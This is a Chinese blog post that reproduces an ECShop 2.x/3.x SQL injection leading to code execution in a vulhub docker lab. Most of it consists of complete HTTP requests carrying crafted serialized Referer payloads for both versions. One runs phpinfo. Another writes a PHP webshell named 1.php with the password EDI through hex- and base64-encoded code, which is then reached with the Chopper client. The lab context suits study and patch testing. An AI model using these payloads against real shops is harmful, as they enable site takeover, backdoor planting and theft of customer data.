ECShop 2.x/3.x SQL注入/任意代码执行漏洞

ECShop 2.x/3.x SQL注入/任意代码执行漏洞

ECShop 2.x/3.x SQL注入/任意代码执行漏洞

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。

漏洞环境

我们先下载环境,在github有别人直接搭建好的docker环境我们直接拿来用即可

git clone git://github.com/vulhub/vulhub.git
cd vulhub/ecshop/xianzhi-2017-02-82239600/
docker-compose up -d

访问IP:8080即可看到ecshop2.7.3的安装页面。

安装配置这样设置即可,数据库密码为root

这样就算搭建完成了

访问IP:8081即可看到ecshop3.6.0的安装页面。

安装配置这样设置即可,数据库密码为root

这样就算搭建完成了

影响版本

Ecshop 2.x

Ecshop 3.x-3.6.0

漏洞复现

Ecshop 2.x

点击用户抓包,然后修改referer值判断漏洞是否存在payload如下

GET /user.php HTTP/1.1
Host: 192.168.200.23:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}
Connection: close
Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

发现phpinfo命令执行成功

我们上传一个webshell,payload如下

GET /user.php HTTP/1.1
Host: 192.168.200.23:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152625255524a58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
Content-Length: 0
Connection: close
Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

上传的webshell名字为1.php,密码为EDI,菜刀连接成功

Ecshop 3.x

点击用户抓包,然后修改referer值判断漏洞是否存在payload如下

GET /user.php HTTP/1.1
Host: 192.168.200.23:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}
Connection: close
Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

发现phpinfo命令执行成功

我们上传一个webshell,payload如下

GET /user.php HTTP/1.1
Host: 192.168.200.23:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:286:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152625255524a58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:9:"' union/*";}
Connection: close
Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

上传的webshell名字为1.php,密码为EDI,菜刀连接成功

posted @ 2021-07-13 13:06  blankunbeaten  阅读(346)  评论(0编辑  收藏  举报